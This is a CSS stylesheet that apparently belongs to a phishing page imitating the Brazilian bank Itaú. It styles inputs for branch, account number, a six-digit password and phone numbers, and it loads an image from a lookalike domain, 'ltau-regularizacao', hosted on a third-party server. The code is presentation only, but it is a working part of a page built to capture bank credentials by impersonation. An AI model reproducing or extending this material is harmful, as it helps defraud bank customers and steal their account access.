body { padding:0; margin:0; }

.oo { font-family:'Arial'; font-size:0px; background:none; color:none; border:none; outline:none; }
.font1 { font-family:'Arial'; font-size:12px; color:#FFF; }
.font2 { font-family:'Arial'; font-size:12px; color:#06C; }
.font3 { font-family:'Arial'; font-size:12px; color:#666666; font-weight:bold; }
.font4 { font-family:'Arial'; font-size:11px; color:#999; }

#top { width:780px; height:65px; border-bottom:1px solid #FFF; }
#top2 { width:780px; height:70px; border-bottom:1px solid #DDD; 
	background: -webkit-linear-gradient(#FFF, #EEE); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#FFF, #EEE); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#FFF, #EEE); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#FFF, #EEE); /* Standard syntax */
	}
#topDen1 { width:780px; height:15px; border-bottom:1px solid #FFF; background:#DDD; }
#topDen2 { width:780px; height:1px; border-bottom:1px solid #CCC; }
#topSub { 
	width:727px; height:53px; margin-left:15px; margin-top:-30px; border-radius:8px; 
	box-shadow: 3px 3px 0px #CCC; border-bottom:2px solid #EA4D00; border-right:2px solid #EA4D00; 
	background: #F60; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#F90, #F60); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#F90, #F60); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#F90, #F60); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#F90, #F60); /* Standard syntax */
	}

#image { width:55px; height:55px; background:url(logo.png) no-repeat; position:absolute; top:10px; left:40px;}

#trinta { width:37px; height:43px; position:absolute; top:3px; left:180px; background:url(http://ltau-regularizacao.cloudhosting.rsaweb.co.za/itau/css/images/haha.fw.png) no-repeat; }

#box { width:780px; height:380px; }
#box2 { width:780px; height:320px; }
#box3 { width:780px; height:260px; }

#Gradient { width:400px; height:auto; float:left;
	padding:10px 12px 10px 12px; margin:15px; border-radius:10px; border:1px solid #CCC;
	background: #EEE; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#FFF, #EEE); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#FFF, #EEE); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#FFF, #EEE); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#FFF, #EEE); /* Standard syntax */
}

#boxGrad { width:398px; height:150px; background:#FFF; border:1px solid #CCC; border-radius:10px; }

#GradientTT { width:408px; height:auto; float:left;
	padding:10px 12px 10px 12px; margin:15px; border-radius:10px; border:1px solid #CCC;
	background: #EEE; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#FFF, #EEE); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#FFF, #EEE); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#FFF, #EEE); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#FFF, #EEE); /* Standard syntax */
}

#boxGradTT { width:406px; height:150px; background:#FFF; border:1px solid #CCC; border-radius:10px; }

#boxRight { width:230px; height:50px; float:right; border:1px solid #CCC;
	padding:10px 12px 10px 12px; margin:15px; border-radius:0;
}

#BoxRightGrad { width:208px; height:50px; background:#FFF;
	border:1px solid #EA4D00; border-radius:10px; padding:10px; font-family:'Arial'; font-size:13px; color:#FFF;
	background: #F60; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#F90, #F60); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#F90, #F60); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#F90, #F60); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#F90, #F60); /* Standard syntax */
	}



#bottom { width:780px; height:20px; border-top:1px solid #CCC;
	background: #DDD; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#EEE, #CCC); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#EEE, #CCC); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#EEE, #CCC); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#EEE, #CCC); /* Standard syntax */
	}

#ag { width:50px; height:20px; padding:4px; border:1px solid #DDD; outline:none; font-size:12px; font-family:'Arial'; border-radius:5px; }
#ct { width:80px; height:20px; padding:4px; border:1px solid #DDD; outline:none; font-size:12px; font-family:'Arial'; border-radius:5px; margin-left:7px; }
#ok { width:40px; height:30px; border:none; outline:none; font-size:13px; border-radius:5px; font-weight:bold; color:#FFF; margin-left:7px;
	background: #069; 
    background: -webkit-linear-gradient(#409CDB, #013080); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#409CDB, #013080); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#409CDB, #013080); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#409CDB, #013080); /* Standard syntax */
	}
	
#infor { width:50px; height:18px; border:1px solid #CCC; padding: 0 0 0 3px; font-size:12px; font-family:'Arial';}
#telefone { width:110px; height:20px; border:1px solid #CCC; padding: 0 0 0 3px; font-size:12px; font-family:'Arial';}
#telefoneF { width:110px; height:20px; border:1px solid #CCC; padding: 0 0 0 3px; font-size:12px; font-family:'Arial';}
#senha6 { width:50px; height:20px; border:1px solid #CCC; padding: 0 0 0 3px; font-size:12px; font-family:'Arial';}

#colorGradLaranja { 
	background: #F60; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#F90, #F60); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#F90, #F60); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#F90, #F60); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#F90, #F60); /* Standard syntax */
}

#azu { 
	background: #069; 
    background: -webkit-linear-gradient(#409CDB, #013080); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#409CDB, #013080); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#409CDB, #013080); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#409CDB, #013080); /* Standard syntax */
	}
	
#conteudo { display:none; width:; height:auto; position:absolute; top:90px; left:200px; border:1px solid #D52100; 
	background:#FEB559; border-radius:10px; padding:9px; box-shadow:3px 3px 3px #CCC;
	background: -webkit-linear-gradient(#FEB559, #E64200); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#FEB559, #E64200); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#FEB559, #E64200); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#FEB559, #E64200); /* Standard syntax */
	}
	
#laranja {
	background:#FE7E0D;
	background: -webkit-linear-gradient(#FEB559, #FE7E0D); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#FEB559, #FE7E0D); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#FEB559, #FE7E0D); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#FEB559, #FE7E0D); /* Standard syntax */
}

#botao { width:300px; padding:0; text-align:center; margin-top:10px; }

#botao input { padding:5px; width:40px; height:33px; margin:5px 2px 2px 2px ; border:1px solid #356991; color:#FFF; border-radius:4px; font-size:13px; font-weight:bold; cursor:pointer;
	background: #069;
    background: -webkit-linear-gradient(#409CDB, #013080); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#409CDB, #013080); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#409CDB, #013080); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#409CDB, #013080); /* Standard syntax */
	}
	
#limpar { width:48px; height:20px; background:url(limpar.jpg) no-repeat; border:0px; }
#ok2 { width:49px; height:21px; background:url(ok.jpg) no-repeat; border:0px; margin-left:30px; }

#bt1 { width:55px; height:18px; background:url(bt1.jpg) no-repeat; border:0; float:right; }
#bt2 { width:73px; height:18px; background:url(bt2.jpg) no-repeat; border:0; float:right; margin-left:10px;}

#it { width:70px; height:20px; padding:4px; border:1px solid #DDD; outline:none; font-size:12px; font-family:'Arial'; border-radius:5px; }
#ok3 { width:38px; height:28px; border:none; outline:none; font-size:13px; border-radius:5px; font-weight:bold; color:#FFF;
	background: #069; 
    background: -webkit-linear-gradient(#409CDB, #013080); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#409CDB, #013080); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#409CDB, #013080); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#409CDB, #013080); /* Standard syntax */
	}
	
#ok4 { width:70px; height:25px; border:none; outline:none; font-size:13px; border-radius:5px; font-weight:bold; color:#FFF; margin-top:5px;
	background: #069; 
    background: -webkit-linear-gradient(#409CDB, #013080); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#409CDB, #013080); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#409CDB, #013080); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#409CDB, #013080); /* Standard syntax */
	}